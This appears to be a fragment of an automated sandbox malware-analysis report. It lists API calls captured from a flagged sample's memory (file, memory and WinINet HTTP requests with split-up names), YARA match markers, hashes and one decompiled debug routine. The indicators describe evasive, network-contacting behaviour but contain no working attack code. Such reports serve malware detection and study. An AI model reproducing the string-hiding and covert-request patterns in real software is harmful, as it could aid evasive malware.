                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction ID: 93286251d1492551862018ef1bd2f6fe4a6ac5a190a981ebb2e9fe772a03b3ef
                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 53%
                                                                                    			E00BCFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                    				void* _t7;
                                                                                    				intOrPtr _t9;
                                                                                    				intOrPtr _t10;
                                                                                    				intOrPtr* _t12;
                                                                                    				intOrPtr* _t13;
                                                                                    				intOrPtr _t14;
                                                                                    				intOrPtr* _t15;
                                                                                    
                                                                                    				_t13 = __edx;
                                                                                    				_push(_a4);
                                                                                    				_t14 =  *[fs:0x18];
                                                                                    				_t15 = _t12;
                                                                                    				_t7 = E00B7CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                    				_push(_t13);
                                                                                    				E00BC5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                    				_t9 =  *_t15;
                                                                                    				if(_t9 == 0xffffffff) {
                                                                                    					_t10 = 0;
                                                                                    				} else {
                                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                    				}
                                                                                    				_push(_t10);
                                                                                    				_push(_t15);
                                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                    				return E00BC5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                    			}










                                                                                    0x00bcfdda
                                                                                    0x00bcfde2
                                                                                    0x00bcfde5
                                                                                    0x00bcfdec
                                                                                    0x00bcfdfa
                                                                                    0x00bcfdff
                                                                                    0x00bcfe0a
                                                                                    0x00bcfe0f
                                                                                    0x00bcfe17
                                                                                    0x00bcfe1e
                                                                                    0x00bcfe19
                                                                                    0x00bcfe19
                                                                                    0x00bcfe19
                                                                                    0x00bcfe20
                                                                                    0x00bcfe21
                                                                                    0x00bcfe22
                                                                                    0x00bcfe25
                                                                                    0x00bcfe40

                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BCFDFA
                                                                                    Strings
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00BCFE2B
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00BCFE01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                    • API String ID: 885266447-3903918235
                                                                                    • Opcode ID: 5ae738f945400c9907efdafe51e8bb4650d01f73cfddbaa82117bf42a4410f9e
                                                                                    • Instruction ID: 0214fcb5e07229ca3d02f8ab58e5e9592c6cf607fc6c1b2337d6afa1075feeed
                                                                                    • Opcode Fuzzy Hash: 5ae738f945400c9907efdafe51e8bb4650d01f73cfddbaa82117bf42a4410f9e
                                                                                    • Instruction Fuzzy Hash: B0F0F632200602BFD6241A45DC06F33BF9AEB44731F244399F628561E2DA62FCA096F0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Executed Functions

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00DA3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DA3B97,007A002E,00000000,00000060,00000000,00000000), ref: 00DA820D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`
                                                                                    • API String ID: 823142352-1441809116
                                                                                    • Opcode ID: 74128cedc668c003c8c5871bfcd3d55ae743e2caa364d32285d8391725f24b91
                                                                                    • Instruction ID: 8e7e231b4691863d6bbdc6f37e1a6cddfe60748f323f12faf3c695b102cd0169
                                                                                    • Opcode Fuzzy Hash: 74128cedc668c003c8c5871bfcd3d55ae743e2caa364d32285d8391725f24b91
                                                                                    • Instruction Fuzzy Hash: F511A2B2604209ABDB18DF98DC85DEB77ADEF8C750B158648FA5D97241CA30E8118BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00DA3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DA3B97,007A002E,00000000,00000060,00000000,00000000), ref: 00DA820D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`
                                                                                    • API String ID: 823142352-1441809116
                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                    • Instruction ID: 82ba4e47cb61f76968030c898f57c2195babc8eab9e7b3769ea7caa6205f9137
                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                    • Instruction Fuzzy Hash: 9DF0B6B2200108AFCB08CF88DC85DEB77ADAF8C754F158248FA0D97241C630E8118BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00DA3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DA3B97,007A002E,00000000,00000060,00000000,00000000), ref: 00DA820D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`
                                                                                    • API String ID: 823142352-1441809116
                                                                                    • Opcode ID: 8b0d11924ab6892fae6f044f30e74a5d3f21072cb3ed0bb76370e21e93a43356
                                                                                    • Instruction ID: 970704d3aadf31a01e81693ea3b21e45a7e363fab2e7e7af3e33c534f1ff5714
                                                                                    • Opcode Fuzzy Hash: 8b0d11924ab6892fae6f044f30e74a5d3f21072cb3ed0bb76370e21e93a43356
                                                                                    • Instruction Fuzzy Hash: E601AFB2211108AFCB48CF88DC95EEB77A9EF8C754F158248FE1997241DA30E8518BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(00DA3D52,5E972F59,FFFFFFFF,00DA3A11,?,?,00DA3D52,?,00DA3A11,FFFFFFFF,5E972F59,00DA3D52,?,00000000), ref: 00DA82B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 2d7d89b025c2b5a9e824c593b4c59b720c1709a6c93e724328171e034f9531c6
                                                                                    • Instruction ID: 29a14dc761a913ebc66f40bf5b3acf92613f356e6f8b8326a7eabd83cd7ad500
                                                                                    • Opcode Fuzzy Hash: 2d7d89b025c2b5a9e824c593b4c59b720c1709a6c93e724328171e034f9531c6
                                                                                    • Instruction Fuzzy Hash: EDF0E7B2200108AFCB08DF89DC80EEB77ADAF8C714F158258BE1D97241CA30E8118BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(00DA3D52,5E972F59,FFFFFFFF,00DA3A11,?,?,00DA3D52,?,00DA3A11,FFFFFFFF,5E972F59,00DA3D52,?,00000000), ref: 00DA82B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                    • Instruction ID: 8cba19b7eab76473ac1c477b4edcef7a8b393131b8654838b3c243eb040561df
                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                    • Instruction Fuzzy Hash: BCF0A4B2200208AFCB14DF99DC81EEB77ADEF8C754F158648BE1D97241DA30E8118BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00D92D11,00002000,00003000,00000004), ref: 00DA83D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                    • Instruction ID: 84de91a3474586326083c9f6a516bf06fffd2f0c225c64397178ffa78fcea66e
                                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                    • Instruction Fuzzy Hash: 4CF015B2200208AFCB14DF89CC81EAB77ADEF88750F118548FE0897241CA30F810CBB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtClose.NTDLL(00DA3D30,?,?,00DA3D30,00000000,FFFFFFFF), ref: 00DA8315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                    • Instruction ID: 04b3762e50164f20b81f98c76816739ba788542d5d0706b92eaeecb5df7d0233
                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                    • Instruction Fuzzy Hash: A8D012756002146BD710EF98CC45E97775CEF44750F154455BA185B242C930F90086E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 28c5f80194601eedb59e59d3eb38f4baba82764954364c8eb462f3dd979b9373
                                                                                    • Instruction ID: cc10bcd187f0ebed39f1f8d071cfd541c3c3d40874c9479fa232d01f17f03a05
                                                                                    • Opcode Fuzzy Hash: 28c5f80194601eedb59e59d3eb38f4baba82764954364c8eb462f3dd979b9373
                                                                                    • Instruction Fuzzy Hash: 339002A1342004036105715A4414616400A97E0245B51C021E1016590DC965D8927165
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7f60291e23b279a3c78623ad34332524ef7b85bbee5732e685f6fbc3d387d357
                                                                                    • Instruction ID: 7633d909570ba3d72822e0c45f45917f50c9eade8c572814697eeec8c83e78e6
                                                                                    • Opcode Fuzzy Hash: 7f60291e23b279a3c78623ad34332524ef7b85bbee5732e685f6fbc3d387d357
                                                                                    • Instruction Fuzzy Hash: 33900265351004032105A55A0704507004697D5395351C021F1017550CDA61D8626161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6c534c1deedee24449d70c6756d9f30c3d61b5a533403f4c4f2fd8daf9990540
                                                                                    • Instruction ID: afb07667baef6a4ea64e7f5b3a4bf5471b90ec247d3679525863fc1c22ed4a33
                                                                                    • Opcode Fuzzy Hash: 6c534c1deedee24449d70c6756d9f30c3d61b5a533403f4c4f2fd8daf9990540
                                                                                    • Instruction Fuzzy Hash: 7F90027134108C02F110615A840474A000597D0345F55C411A4426658DCAD5D8927161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 16231773c919748490d7d32a0864da4967a2e6581355dbc6fc8f60796c5ec312
                                                                                    • Instruction ID: ade336944d912d0e36553546e67d1cf768ef26db9c576161839c983889e2d272
                                                                                    • Opcode Fuzzy Hash: 16231773c919748490d7d32a0864da4967a2e6581355dbc6fc8f60796c5ec312
                                                                                    • Instruction Fuzzy Hash: 8790027134100C42F100615A4404B46000597E0345F51C016A0126654DCA55D8527561
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 827cc3db9b0c50f9310cb952addfb32decb336773abfc1c58a34b04bece45142
                                                                                    • Instruction ID: 51a0e4e3a2e90c0812ad4588cdd95788c5168b70407f89e9dfa8e79aeaf6f69a
                                                                                    • Opcode Fuzzy Hash: 827cc3db9b0c50f9310cb952addfb32decb336773abfc1c58a34b04bece45142
                                                                                    • Instruction Fuzzy Hash: 4D90027134100C02F180715A440464A000597D1345F91C015A0027654DCE55DA5A77E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8fd4ec5333189cee48dc5cd7e8cf2d5c581f12045e3b0da1303ead89e86a9d43
                                                                                    • Instruction ID: 95a555f4ddf6cd8c9e404bb0b1d31e81be4aa0162ad66f3669243b5e0c731d5a
                                                                                    • Opcode Fuzzy Hash: 8fd4ec5333189cee48dc5cd7e8cf2d5c581f12045e3b0da1303ead89e86a9d43
                                                                                    • Instruction Fuzzy Hash: AA90027134504C42F140715A4404A46001597D0349F51C011A0066694DDA65DD56B6A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 111285dea24215243c402f7cccd96a3f3174bf983c01d52f8628142362502a3e
                                                                                    • Instruction ID: 3fd64ccb348ffbb47d005904d9b32518a6a294dca1232c7ab2b948040596cda1
                                                                                    • Opcode Fuzzy Hash: 111285dea24215243c402f7cccd96a3f3174bf983c01d52f8628142362502a3e
                                                                                    • Instruction Fuzzy Hash: 2790027135114802F110615A8404706000597D1245F51C411A0826558DCAD5D8927162
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0444b93f006a3755ed3211c774e8be6427b755e495f791577b1458bf8a137554
                                                                                    • Instruction ID: 6356b95611b4440e235348a1ae4e15c18acc923507d226b888da6ebbc4149362
                                                                                    • Opcode Fuzzy Hash: 0444b93f006a3755ed3211c774e8be6427b755e495f791577b1458bf8a137554
                                                                                    • Instruction Fuzzy Hash: DF90026935300402F180715A540860A000597D1246F91D415A0017558CCD55D86A6361
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6e7834480763b24e202a4cabc2b2c2ea51345b7b789dffe22dd0a08d328fd536
                                                                                    • Instruction ID: 239923df4a100db6e990b1c25e8fe1e5fe7b22222453e9b297465285e705e11f
                                                                                    • Opcode Fuzzy Hash: 6e7834480763b24e202a4cabc2b2c2ea51345b7b789dffe22dd0a08d328fd536
                                                                                    • Instruction Fuzzy Hash: BC90027134100802F100659A5408646000597E0345F51D011A5026555ECAA5D8927171
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b472fe19f8ad93496ae2c0e8b039004c4aeafe0426ee41d8c32a9373adf804f0
                                                                                    • Instruction ID: 2218123fb3ecf2b4a507084b9dac071be2659d3f34aabebb7e8881fcbf83038e
                                                                                    • Opcode Fuzzy Hash: b472fe19f8ad93496ae2c0e8b039004c4aeafe0426ee41d8c32a9373adf804f0
                                                                                    • Instruction Fuzzy Hash: 8690027134100813F111615A4504707000997D0285F91C412A0426558DDA96D953B161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 272b1df77f8bb441d0e8de168650add7449c11652fdd6b8d29cbda5e1217c1bb
                                                                                    • Instruction ID: a38dc3ae14340d49f5b0fc8b467d9724bc8ef5b28cd81c32f02333add8420af1
                                                                                    • Opcode Fuzzy Hash: 272b1df77f8bb441d0e8de168650add7449c11652fdd6b8d29cbda5e1217c1bb
                                                                                    • Instruction Fuzzy Hash: DE900261382045527545B15A44045074006A7E0285791C012A1416950CC966E857E661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 201e524d778cbaa950525f12b216da789bd393bfd6a61d1ce5f82e79dfe41447
                                                                                    • Instruction ID: 575ed5d9aa34dee200597a3855f80e01466a2a0840d58401355137fa1aea0e2a
                                                                                    • Opcode Fuzzy Hash: 201e524d778cbaa950525f12b216da789bd393bfd6a61d1ce5f82e79dfe41447
                                                                                    • Instruction Fuzzy Hash: 9C9002A138100842F100615A4414B060005D7E1345F51C015E1066554DCA59DC537166
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b9fba887b07f42adf1d1d54b9355b690068ba61bc4114a9a1cb6f10861024587
                                                                                    • Instruction ID: f179fcccebcf19bba5026a7d6f6a842ea0c82d91c96344142f1fc69ca27cf0a7
                                                                                    • Opcode Fuzzy Hash: b9fba887b07f42adf1d1d54b9355b690068ba61bc4114a9a1cb6f10861024587
                                                                                    • Instruction Fuzzy Hash: E99002B134100802F140715A4404746000597D0345F51C011A5066554ECA99DDD676A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ebb3809ac4480383dc8d5ff9e1709458423dd31f1547012fdc5d0f02f90f3eb5
                                                                                    • Instruction ID: a064034568e0481d9b979573e8a4bf10f219079c621f3c668cd5eedb6b1de66d
                                                                                    • Opcode Fuzzy Hash: ebb3809ac4480383dc8d5ff9e1709458423dd31f1547012fdc5d0f02f90f3eb5
                                                                                    • Instruction Fuzzy Hash: E090026135180442F200656A4C14B07000597D0347F51C115A0156554CCD55D8626561
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DA8938
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpOpenRequest
                                                                                    • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                    • API String ID: 1984915467-4016285707
                                                                                    • Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                                    • Instruction ID: 94c68b23e25758ca5701b703d8facf05d2df7787f5fec71724195d4c6f3c603f
                                                                                    • Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                                                                    • Instruction Fuzzy Hash: F401E5B2A05159AFCB04DF98D841DEF7BB9EB48210F158288FD48A7205D630EE10CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DA8938
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpOpenRequest
                                                                                    • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                    • API String ID: 1984915467-4016285707
                                                                                    • Opcode ID: 40577d0d61336138bc75bac801066253a5c62ab29eefffa67608031ecb29e8ac
                                                                                    • Instruction ID: 4bf83242350e09ab38a02a4421890f57021f848e98a92b0194705b02128cd756
                                                                                    • Opcode Fuzzy Hash: 40577d0d61336138bc75bac801066253a5c62ab29eefffa67608031ecb29e8ac
                                                                                    • Instruction Fuzzy Hash: 9501D7B6905159ABCB14DF88C981DEF7BB9EF48350F158188FD48AB315D730AE118BA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DA89AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpRequestSend
                                                                                    • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                    • API String ID: 360639707-2503632690
                                                                                    • Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                                    • Instruction ID: d4c4cef6a96400695613f5abefaa867ee9ea34dfa78c72541e9a8f5315a857f0
                                                                                    • Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                                                                    • Instruction Fuzzy Hash: A4014BB2905119AFCB00DF98D845AAFBBBCEB48210F148189FD08A7304D670EE10CBF2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DA89AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
